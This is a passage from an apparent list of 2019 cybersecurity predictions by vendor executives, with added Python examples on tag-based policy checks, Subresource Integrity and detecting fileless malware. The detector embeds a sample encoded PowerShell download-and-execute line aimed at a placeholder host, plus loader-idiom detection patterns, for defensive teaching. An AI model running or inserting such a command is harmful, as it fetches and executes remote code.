SIM jacking strikes: "An all-new social engineering attack will hit the mainstream: SIM jacking, whereby criminals convince phone carriers to port a target’s ‘lost’ SIM card to one that’s in the hacker’s possession. This allows the hacker to take control of any part of the target’s online presence that’s associated with their mobile number, and bypass two-factor authentication that involves an SMS code." – Bharat Mistry, principal security architect, Trend Micro.
Skills shortage - technology plays a key role in closing the skills gap: "Security teams need to do more with the limited people they have. Threats are increasing, but the size of teams is often not. Even companies with budgets to hire still have open slots due to the limited supply of trained staff available worldwide. Technology that can perform certain processes without the need for human intervention will be critical to helping teams be more efficient.... When data collection and analytics are a part of this process, the decision makers must have the intelligence needed to make informed decisions. In the coming year, CISOs will be looking to implement more solutions, particularly ones that can be automated and integrate seamlessly with other solutions, to help ease the pain felt by the growing cyber-security skills gap." – Adam Vincent, CEO and co-founder, ThreatConnect.
Cyber-security skills gap reaches tipping point: "(The cyber-security skills) gap is also increasing….with 63 percent of businesses lacking the cyber skills to actually keep threats at bay. As cyber attackers’ tactics become ever more sophisticated and, more importantly, harder to spot, they are needing ever more hours of the good guys’ time to identify and stop. Added to this, many organisations are finding it harder and harder to recruit and retain cyber-specialists to help them keep the bad guys at bay. Which means they’re relying on fewer people with the skills and expertise needed to protect their organisation. These decreasing human resources will come to a head in 2019, where I predict that organisations will stop being able to keep up with investigating these ‘stealth’ cyber attacks." – Michael Flouton, VP, product ops and security strategy, Barracuda Networks.
Sleeper agents with time bombs will sink your company: "It takes companies an average of 206 days to discover a breach. And the threat doesn’t just have to be external: you could have sleeper agents placing time bombs in advance. If done quietly over a period of time, you could lose your backups as well, with no way of tracing the culprit." – David Francis, head of security, KCom.
Social engineering attacks continue to plague organisations: "They are a go-to method for hackers, relying on unwitting, unsuspecting and, at times, careless employees. The key to defending against this type of threat is education; giving employees the skills and knowledge they need to identify potential attacks will be the best way of mitigating the insider threat risk." – Steve Wainwright, managing director EMEA, Skillsoft.
Social media passes its peak: "Professional use of social media such as Twitter and Linkedin will continue to grow, but individuals will turn once again to private, one-to-one channels for interpersonal communication." – Nat Kausik, CEO, Bitglass.
Software bot attack predicted: "2019 will see the first big data breach involving a software-bot, and critical infrastructure will be the big ticket target for hackers." – Paul Trulove, CPO, SailPoint.
Software: infrastructure as code adoption skyrockets and security as code will appear: "Security is a part of infrastructure definition and the push for full automation needs security to be included. This is related to immutable infrastructure and software defined security trends." – Sergio Loureiro, director cloud solutions, Outpost24.
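The two ideas above, FireMon's tag-driven policy (rules attached to a tag rather than to individual hosts, so a newly spun-up server inherits them by being tagged correctly) and Outpost24's security as code (the policy evaluated as part of the infrastructure definition, in the pipeline, before anything is created), are the same mechanism seen from two ends. The block below is an added example written for this page, not code from FireMon, Outpost24 or any tool; the resource schema is a constructed, simplified stand-in for a parsed Terraform plan or CloudFormation template, and the tag names and rules are assumptions chosen to make the shape clear.

```python
import ipaddress

# --- Checks: each takes one resource definition and returns a list of
# violation strings (empty when the resource is compliant). ---

def world_open(ingress):
    """True when an ingress rule admits traffic from any source address."""
    return ipaddress.ip_network(ingress["cidr"], strict=False).prefixlen == 0

def no_world_open_ingress(r):
    return [f"{r['name']}: port {i['port']} open to {i['cidr']}"
            for i in r.get("ingress", []) if world_open(i)]

def only_web_ports_public(r):
    return [f"{r['name']}: non-web port {i['port']} exposed to {i['cidr']}"
            for i in r.get("ingress", [])
            if world_open(i) and i["port"] not in (80, 443)]

def disk_encrypted(r):
    return [] if r.get("encrypted_disk") else [f"{r['name']}: disk not encrypted"]

def logging_enabled(r):
    return [] if r.get("logging") else [f"{r['name']}: access logging disabled"]

# --- Policy: rules bind to tag values, not to named resources. A new
# resource picks up the whole rule set the moment it carries the tag,
# which is the "tag it and spin it up" model described above. (Tag names
# and rule choices are assumptions for this example.) ---
RULES = {
    ("tier", "public"):   [only_web_ports_public],
    ("tier", "internal"): [no_world_open_ingress],
    ("data", "pii"):      [disk_encrypted, logging_enabled],
}
# An untagged resource would match no rule at all and sail through, so the
# absence of the tag that selects a rule set is itself a violation.
REQUIRED_TAGS = ("tier",)

def evaluate(infra):
    """Return every violation found in a parsed infrastructure definition."""
    violations = []
    for r in infra["resources"]:
        tags = r.get("tags", {})
        for t in REQUIRED_TAGS:
            if t not in tags:
                violations.append(f"{r['name']}: missing required tag '{t}'")
        for (key, value), checks in RULES.items():
            if tags.get(key) == value:
                for check in checks:
                    violations.extend(check(r))
    return violations

# Constructed sample definition: a simplified stand-in for a plan file,
# not real output of any IaC tool.
INFRA = {"resources": [
    {"name": "web-1", "tags": {"tier": "public"},
     "ingress": [{"port": 80, "cidr": "0.0.0.0/0"},
                 {"port": 443, "cidr": "0.0.0.0/0"}]},
    {"name": "db-1", "tags": {"tier": "internal", "data": "pii"},
     "ingress": [{"port": 5432, "cidr": "0.0.0.0/0"}],
     "encrypted_disk": False, "logging": True},
    {"name": "cache-1", "tags": {"tier": "internal"},
     "ingress": [{"port": 6379, "cidr": "10.0.0.0/8"}]},
    {"name": "scratch-1", "tags": {},
     "ingress": [{"port": 22, "cidr": "0.0.0.0/0"}]},
]}

if __name__ == "__main__":
    problems = evaluate(INFRA)
    for p in problems:
        print("FAIL", p)
    raise SystemExit(1 if problems else 0)  # non-zero exit blocks the pipeline
```

Run against the sample, the check fails the database for its world-open port and unencrypted disk and fails the scratch host for carrying no tier tag at all; the public web host and the internal cache pass. The required-tag rule is the part people leave out: a tag-driven policy only protects what is tagged, so "untagged" has to be a failing state, not a neutral one.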
Spoofing made easier: "Distinguishing fact from fakery has never been harder, and the efforts from social media brands will not be enough to keep up with the deluge of cyber propaganda in 2019. Despite calls for additional regulation, these sites won’t have the time to clear the internet ‘airwaves’ of fake news. Motivation to influence democratic elections will only evolve, and thanks to technology that allows fake news propagators to sway public sentiment – whether that’s AI-enabled voice or video editing tools – cyber-propaganda will have the power to decide the fate of nations." – Bharat Mistry, principal security architect, Trend Micro.
State-employed white hat hackers increasingly "moonlight" with organised crime: "Information security professionals are moonlighting as hackers-for-hire within criminal organisations all over the world. This trend is especially prevalent in Russia, where poorly paid government employees can earn extra income working for powerful and sophisticated criminal networks with ties to the government." – Stan Lowe, CISO, Zscaler.
State-level cyber-attacks force a UN Cyber Security Treaty: "The UN will more forcefully tackle the issue of state-sponsored cyber attacks by enacting a multinational Cyber Security Treaty in 2019." – WatchGuard Threat Lab.
Stock prices impacted by cyber-breaches: ...especially in the technology and cyber-security sector. "Even though high-profile attacks are becoming more common, we haven’t yet seen them damage stock prices to a great extent. But look for this to change in 2019 as organisations complete their digital transformations and oversight bodies have the ability to levy significant fines. Once this happens, breaches will have a much more serious impact on the business, revenue, and customers – and logically, a detrimental impact on stock price." – Stan Lowe, CISO, Zscaler.
Supply chain breaches in web applications get increased focus: "These attacks differ from normal supply chain attacks as instead of targeting code in the manufacturing line, as components are loaded cross domain and across organisations, the website security of large organisations will be broken based on their dependency on small organisations." – Martin Jartelius, CSO, Outpost24.
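The dependency Jartelius describes is a script tag pointing at a third party's domain: the large organisation's page executes whatever that smaller organisation serves today, not what was reviewed. The browser-side control for exactly this case is Subresource Integrity, which pins the tag to a digest of the reviewed bytes. The block below is an added example written for this page, not code from Outpost24 or from any browser; it generates the integrity value and models the browser's check, including the caveat that an unrecognised algorithm name silently disables it.

```python
import base64
import binascii
import hashlib
import hmac

# Digest algorithms SRI allows, ranked by strength; anything else that
# appears in an integrity attribute is ignored by the browser.
SRI_ALGS = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(content: bytes, alg: str = "sha384") -> str:
    """Value for an HTML integrity attribute, computed from the exact bytes
    you reviewed; the bytes served later must match them byte for byte."""
    if alg not in SRI_ALGS:
        raise ValueError("SRI permits sha256, sha384 or sha512 only")
    digest = hashlib.new(alg, content).digest()
    return f"{alg}-{base64.b64encode(digest).decode()}"


def sri_matches(content: bytes, integrity: str) -> bool:
    """Model of the browser's check: parse the attribute, keep only the
    strongest recognised algorithm, and accept the content if it matches
    any digest listed for that algorithm.

    Caveat: if no token is recognised (a typo in the algorithm name, a
    broken base64 value), the attribute is treated as absent and the
    resource loads unchecked. Lint generated tags rather than trusting them.
    """
    parsed = []
    for token in integrity.split():
        alg, sep, digest_b64 = token.partition("-")
        if not sep or alg not in SRI_ALGS:
            continue
        try:
            parsed.append((alg, base64.b64decode(digest_b64, validate=True)))
        except binascii.Error:
            continue
    if not parsed:
        return True  # no usable metadata: nothing is enforced
    strongest = max(SRI_ALGS[a] for a, _ in parsed)
    actual = {a: hashlib.new(a, content).digest() for a, _ in parsed}
    return any(hmac.compare_digest(actual[a], d)
               for a, d in parsed if SRI_ALGS[a] == strongest)


def script_tag(src: str, content: bytes) -> str:
    """Tag for a cross-origin script pinned to the reviewed bytes. The
    crossorigin attribute is required: without CORS the response is opaque
    and the browser cannot verify it."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    reviewed = b"console.log('widget v1');"  # constructed stand-in for a vendor script
    print(script_tag("https://cdn.example.invalid/widget.js", reviewed))
    print("unchanged :", sri_matches(reviewed, sri_hash(reviewed)))
    print("tampered  :", sri_matches(reviewed + b"//x", sri_hash(reviewed)))
```

SRI only helps for resources whose bytes you can pin, so it does not cover a vendor script that legitimately changes daily; for those the remaining options are to self-host a reviewed copy or to confine the script with a Content Security Policy. Either way, the decision should be explicit rather than left to whatever the third party serves.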
Swarms: Swarm-as-a-Service/A-la-Carte Swarms: "Significant advances in sophisticated attacks powered by swarm-based intelligence technology are bringing us closer to a reality of swarm-based botnets known as hivenets. (They)...will be used to create large swarms of intelligent bots that can operate collaboratively and autonomously. When delivering autonomous, self-learning Swarms-as-a-Service, the amount of direct interaction between a hacker-customer and a black hat entrepreneur will drop dramatically. A-la-Carte Swarms: Resources in a swarm network could be allocated or reallocated to address specific challenges encountered in an attack chain. A swarm that criminal entrepreneurs have already preprogrammed with a range of analysis tools and exploits, combined with self-learning protocols that allow them to work as a group to refine their attack protocols, makes purchasing an attack for cyber-criminals as simple as selecting from an a-la-carte menu." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
Talking the talk but not walking the walk: "Organisations will keep talking about defence in depth but keep building a wall around their perimeter and leaving a very soft network inside. Phishing will continue to rise, and organisations will keep claiming user responsibility for insecurity and gullibility as the problem, however it will still be down to not hardening workstations and internal networks." – Martin Jartelius, CSO, Outpost24.
Technology advancements create new tools and opportunities for hackers: "Whether working for a hostile intelligence service, a multi-national criminal syndicate, or as freelance mercenaries offering network-intrusion-as-a-service, hackers are part and parcel of this community and see the value and potential in new technologies like artificial intelligence (AI) and machine learning in the same way that the mainstream IT industry does – but for different, more sinister purposes. Hackers can exploit AI and machine learning ... to strengthen phishing attacks by using analytics, prediction and simulation functionality to improve the apparent authenticity of scam emails in new ways. Hackers can also use these technologies to improve their understanding of a network’s defences and identify weaknesses to exploit while side-stepping or obscuring their activity from those same defences." – Phil Celestini, chief security and risk officer, Syniverse.
Threat report, FireEye/Mandiant. From deteriorating rules of engagement by state actors to the predicted use of the Tokyo Olympics as a focus for both criminal and political cyber attacks, FireEye Mandiant predictions range over: "Nations developing offensive capabilities • Breaches continuing due to lack of attribution and accountability • The widening skills gap, and less trained experts to fill security roles • Lack of resources, especially for small and medium-sized enterprises • Supply chain as a weakness • Attackers eyeing the cloud, since that’s where the data is headed • Social engineering, considered by many to be the most dangerous threat • Cyber espionage, cyber-crime and other threats to the aviation industry. Regionally the report looks at restructuring of Chinese cyber-espionage • Increase in Iranian threat activity against US. • Use of publicly available malware by major threat actors • Abuse of legitimate services for command and control • Sights set on e-commerce rather than point of sale • Online banking portals in the crosshairs • Reduced use of Flash and Java to improve security • More business email compromise as initial attack vector • Emerging technologies used to evade detection." – FireEye Annual Threat Report.
Unsophisticated attackers will get better at breaking into OT Networks: "But will likely lack the level of sophistication needed to have a significant physical impact. Ever more sophisticated tools and techniques for hacking are available for downloading from the web. This means that the number of unsophisticated hackers able to break into systems will rise – but what they’re able to do once they get in is another question. If you look at Russia’s attacks on the Ukrainian power grid, attackers were able to remain undetected and do reconnaissance work for months. To bring down power for nearly 250,000 customers, they had to thoroughly understand the operations at the targeted plant. That level of sophistication can’t be bought and sold on the internet, which means that the real damage will continue to be done by actors with access to the right skills and resources." – Suzanne Spaulding, adviser, Nozomi Networks, former DHS under secretary.
Vaporworms or fileless malware worms will emerge: "Fileless malware strains will exhibit wormlike properties in 2019, allowing them to self-propagate by exploiting software vulnerabilities. Fileless malware is more difficult for traditional endpoint detection to identify and block because it runs entirely in memory, without ever dropping a file onto the infected system." – WatchGuard Threat Lab.
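Because nothing is written to disk, the evidence that fileless malware leaves is in process telemetry: which program was launched, by what parent, with what command line. The block below is an added example written for this page, not code from WatchGuard or any EDR product; it applies a handful of the heuristics defenders commonly use to process-creation events (encoded PowerShell, download-and-execute idioms, a script host spawned by an Office application) and decodes the encoded command so the idiom checks see the plaintext. The events are constructed samples in a simplified Sysmon-like shape, and the heuristic list is illustrative rather than a complete rule set.

```python
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Idioms that fetch or decode code and run it without writing a file.
# (Illustrative list, not an exhaustive detection rule.)
LOADER_IDIOMS = [r"\bIEX\b", r"Invoke-Expression", r"DownloadString",
                 r"FromBase64String", r"Reflection\.Assembly", r"VirtualAlloc"]
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
STEALTH_FLAGS = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event):
    """Reasons a process-creation event looks like in-memory execution
    (empty list means none of the heuristics fired)."""
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")
    reasons = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    visible = f"{cmd} {decoded or ''}"  # scan the decoded text as well
    for idiom in LOADER_IDIOMS:
        if re.search(idiom, visible, re.IGNORECASE):
            reasons.append(f"in-memory loader idiom: {idiom}")
    if STEALTH_FLAGS.search(cmd):
        reasons.append("hidden window / no-profile flags")
    if image in SCRIPT_HOSTS and parent in OFFICE_APPS:
        reasons.append(f"script host {image} spawned by {parent}")
    return reasons


# Constructed sample telemetry. The payload and host name are invented;
# example.invalid is a reserved, non-resolving domain.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["image"]), "<-", basename(ev["parent_image"]), analyze(ev))
```

Run on the samples, the first event fires on every heuristic, the administrator's scheduled script fires on none, and the Office-spawned rundll32 fires on parentage alone, which is the right outcome: parentage is a weak signal on its own and should raise a score, not a ticket. Decoding the encoded command before matching is the step most often skipped, and it is the one that turns a generic "encoded PowerShell" alert into something an analyst can act on.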
Wi-Fi-based attacks will surge as new IoT devices enter the workplace: "50 percent of organisations are running IoT devices on their wireless networks, … but only 36 percent of IT professionals are confident in their ability to respond to cyber-attacks on IoT devices. We’ll certainly hear more about security lapses on IoT devices in 2019." – Spiceworks research.
Windows 7 end of life impact: "Windows 7 and Windows 2008 R2 end-of-service in 2019 will drive change in the industry as companies upgrade and replace their aging hardware." – Spiceworks research.
Windows 7 will continue to be an issue: "Especially now that Microsoft is offering extended ‘security update’ support until January 2023. While companies struggle to mitigate the effects of maintaining Windows 7 for another five years, they can count on having to defend against botnets built up of the same (as happened with machines running Windows XP). Companies that delay investing in their IT environments will find themselves defending against insider and outsider attacks made viable by clinging on to vulnerability-ridden operating systems." – Naaman Hart, managed services security engineer, Digital Guardian.
WPA3 Wi-Fi network will be hacked using one of the six Wi-Fi threat categories: "Hackers will use rogue APs, Evil Twin APs, or any of the six known Wi-Fi threat categories (as defined by the Trusted Wireless Environment Framework) to compromise a WPA3 Wi-Fi network, despite enhancements to the new WPA3 encryption standard. Unless more comprehensive security is built into the Wi-Fi infrastructure across the entire industry, users can be fooled into feeling safe with WPA3 while still being susceptible to attacks like Evil Twin APs." – WatchGuard Threat Lab.
Zero-day mining as a service using AIF: "Once AIF (artificial intelligence fuzzing - see Fuzzing, above) is in place, it can be pointed at code within a controlled environment to mine for zero-day exploits. Once this process becomes streamlined, zero-day mining-as-a-service will become enabled, creating customised attacks for individual targets. (Defence) …. will be especially challenging when using the isolated legacy security tools which many organisations have deployed in their networks today." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
Zero trust becomes the driver for digital transformation: "The rapid adoption of cloud services and infrastructure, combined with an increasingly mobile workforce, has forced IT teams to change their approach to security, leading to the emergence of the 'zero trust' concept. Today’s users expect to be able to log onto applications such as Facebook simply, without needing to consider how they are being connected; the same should be said for accessing enterprise networks and applications. The process should be seamless, consistent, and—crucially—invisible to its users. Security must therefore be ‘baked-in,' ensuring that users are seamlessly authenticated however they choose to access services, while ensuring that access is appropriate to their role and requirements." – Nathan Howe, solution architect, Zscaler.